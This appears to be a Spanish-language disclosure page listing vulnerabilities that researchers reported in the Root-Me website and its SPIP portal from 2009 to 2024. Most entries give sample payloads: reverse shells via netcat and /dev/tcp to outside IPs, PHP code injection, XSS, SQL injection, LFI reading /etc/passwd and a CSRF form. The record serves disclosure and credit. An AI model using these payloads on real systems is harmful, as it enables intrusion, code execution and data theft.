Debilidades descubiertas

Como en cualquier sistema de información, se detectaron algunos puntos débiles en el sitio web.

26/08/2024 Mika

ha identificado una vulnerabilidad de inyección de comandos en el sistema operativo que permite a un usuario obtener acceso root a los servidores de retos al desplegar un reto con una bandera maliciosa.

RM{' && nc.traditional 51.75.X.X 4444 -e /bin/bash #}

21/08/2024 Vozec & Laluka

han identificado una vulnerabilidad de Ejecución Remota de Código (RCE) que permite a un usuario no autenticado ejecutar código PHP en el portal SPIP.

07/02/2024 Nishacid

Ha identificado una vulnerabilidad XSS almacenada en las traducciones, que permite a un miembro de la asociación modificar cualquiera de las traducciones del sitio con código JavaScript utilizando :

<img/src/onerror=confirm(document.domain)>

22/11/2023 Laluka

Se ha identificado un XSS almacenado (a través de carga de archivos) a RCE vía inyección de código en la configuración de mediabox. El código PHP es reflejado (json_dump) y luego evaluado; la cuenta objetivo debe ser webmestre.

const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');

const formData = new FormData(form);

formData.append("lity[<?php echo system(base64_decode('aWQ='));?>]", 42);

14/07/2023 Elweth

Detectada una vulnerabilidad en la versión de Chrome Headless que los bots utilizan para los retos Web-Client. La versión en cuestión era vulnerable a CVE-2021-21224, lo que podía llevar a la ejecución de código en el entorno del bot.

27/08/2022 Laluka

Se ha identificado una vulnerabilidad por la que al cambiar el estado del contenido del sitio (documento, reto, entrada, ...) a un nivel superior (por ejemplo, de borrador a evaluación o de papelera a escritura) se envía un correo electrónico al autor del reto y/o al webmaster. Algunas variables, como el título y el contenido, no se codifican o escapan correctamente antes de pasarlas a la función eval que genera el correo electrónico. Esto permitía que se produjera un Blind-RCE con una carga útil como <?php system("bash -c 'id > /dev/tcp/42.42.42.42/4242'"); ?> en el título o el contenido del artículo.

send(eval($email));

21/07/2022 Abyss Watcher& SpawnZii

han identificado una vulnerabilidad de ejecución remota de código (RCE) que permite a un usuario privilegiado ejecutar código PHP:

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG 9DIjt9'"><?php system('id;hostname;whoami');?>

Abyss Watcher SpawnZii

11/07/2022 Abyss Watcher

identificó una vulnerabilidad XSS almacenada explotable con un iframe alojado en el dominio RM :

<iframe src="https://www.root-me.org/IMG/html/xss.html">

17/03/2022 Mizu

identificó una vulnerabilidad XSS almacenada explotable con un iframe alojado en un dominio malicioso que comienza con www.root-me.org :

<iframe src="https://www.root-me.org.evil.domain/">

23/11/2021 zLade

identificó una vulnerabilidad que permitía a un miembro de la asociación elevar su rol a administrador simplemente utilizando la interfaz privada de SPIP.

01/10/2021 Podalirius

identificó una vulnerabilidad que permitía el acceso a los documentos adjuntos a las soluciones sin restricciones:

<imgXX>

15/05/2020 Laluka

identificó múltiples vulnerabilidades : 3 XSS reflejadas, 2 SQLi y 1 RCE :

https://www.root-me.org/ecrire/?exec=plan&null=lalu%27%20onmouseover=alert(domain)%20style=%27width:9999999px;height:9999999px;%27%20foo=

https://www.root-me.org/ecrire/?exec=article&id_article=1&_oups=lalu%27https://www.root-me.org/%3E%3Ca%20href=err%20onfocus=alert(domain)%20autofocus/%3E

https://www.root-me.org/ecrire/?exec=admin_plugin&var_profile=pouet'/><script>alert(document.domain)</script>

https://www.root-me.org/ecrire/?exec=article_edit&lier_trad=1+AND+1%3D2%20union%20all%20select%201,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25;--

/ecrire/?exec=accueil&where[]=(SELECT%20SLEEP(5)=1);--+-

https://www.root-me.org/ecrire/?exec=article&id_article=1&ajouter=non&tri_liste_aut=statut&deplacer=oui&_oups=%27%3C?php%20echo%20fread(popen(%22id%22,%20%22r%22),%20300);?%3E

12/01/2020 NonStandardModel

identificó una vulnerabilidad XSS en el nombre del archivo importado en http://repository.root-me.org/

04/06/2019 warlock

identificó una vulnerabilidad XSS. Esta requería una intervención del usuario en el chatbox (un clic en la página anterior).

http://www.root-me.org/data:%2F%2Ftext/html,<script>alert(1)<%2Fscript>

04/06/2019 warlock

ha identificado una vulnerabilidad que permite matar, con un usuario sin privilegios, la base de datos disponible en el servidor challenge01 que aloja varios desafíos, saturando la memoria de una manera particular para matar el proceso de su elección. Esto permitió reiniciar otro binario en su lugar escuchando en el mismo puerto a través de una condición de carrera.

16/11/2018 Hacqueen

identificó una vulnerabilidad que permitía atrapar a los usuarios de la tienda a través de un iframe mediante un dominio de spreadshirt controlado por el atacante (por ejemplo, spreadshirt.ro), el parámetro lang no se filtraba correctamente.

12/04/2018 DrStache& urandom

identificaron una vulnerabilidad XSS almacenada en el mapa de OSM en las salas de CTFATD al inyectar el siguiente payload en la biografía del usuario (https://www.root-me.org/?page=preferences&lang=en)

<svg onload=console.log(document.domain)>

DrStache urandom

12/10/2015 ST4HLKR1EG

ha identificado una vulnerabilidad "Insecure Direct Object Reference" que permite leer cualquier mensaje privado :

page=messagerie&formulaire_action=messages_recus&formulaire_action_args=[valeur_random]&id_auteur=[id_auteur]&selection=sel&marquer_non_lus=marquer+comme+non+lu&selectionne[]=[message_ID]

03/2015 WtF

ha identificado una vulnerabilidad de ejecución remota de código (RCE) en un reto que está siendo evaluado en el servidor de producción, permitiendo acceder al sistema de archivos con ssh y ejecutar comandos.

03/2015 WtF

ha identificado una vulnerabilidad de inclusión de archivos arbitrarios (LFI) en el desafío del servidor web Path Truncation que permite leer archivos de otros desafíos.

15/06/2013

LouTerraillouneha identificado una vulnerabilidad de inyección de código PHP en la página "code - decode":

Texto a decodificar en base64 :

PD9waHAgcGhwaW5mbygpOyA/Pg==

06/11/2012 jimee

encontró varios XSS almacenados en la gestión de perfiles de usuario :

<script>[code javascript/vbscript]</script>

20/03/2012 jimee

encontró un LFI en un desafío :

http://www.root-me.org/challenge/hidden/hidden/page_..%252f..%252f..%252fch1%252fmesfonction.php

23/10/2011 courte66

encontró un XSS reflejado en la página "encode - decode" :

Texto a decodificar en base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

02/10/2011 Hypnoze

encontró una referencia indirecta insegura a un objeto que conducía a un acceso no autorizado a todos los PM :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

11/07/2011 Armel

encontró un XSS almacenado en el chatbox.

<iframe src="javascript:[code javascript]' />

18/07/2011 g0uZ

encontró una vulnerabilidad de inyección de código PHP en las "herramientas en línea : nmap"

Anfitrión para escanear en modo -sV :

--version-trace -p8888 [IP server attacker]

Servicio de escucha en el servidor del atacante

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

30/06/2011 elyfean

encontró un CSRF en el chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">

<input type=hidden name="ON" value="1">

<input type=hidden name="message" value="0wn3d !">

</form>

15/02/2011 EsSandre

encontró un LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

02/02/2011 hello

encontró varios XSS almacenados en el sistema PM :

<script>[code javascript/vbscript]</script>

02/12/2009 real

encontró una vulnerabilidad de inyección de código :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'